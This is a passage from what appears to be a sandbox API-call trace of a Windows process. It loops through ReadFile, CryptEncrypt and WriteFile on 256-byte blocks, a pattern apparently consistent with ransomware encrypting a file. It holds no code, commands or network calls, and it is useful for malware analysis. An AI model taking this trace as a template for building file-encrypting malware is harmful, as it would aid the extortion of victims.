lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.116] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.116] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.116] GetLastError () returned 0x0 [0167.116] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.117] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.117] GetLastError () returned 0x0 [0167.117] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.117] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.118] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.118] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.118] GetLastError () returned 0x0 [0167.118] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.119] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.119] GetLastError () returned 0x0 [0167.119] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.119] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.120] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.120] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.120] GetLastError () returned 0x0 [0167.120] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.121] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.121] GetLastError () returned 0x0 [0167.121] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.121] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, 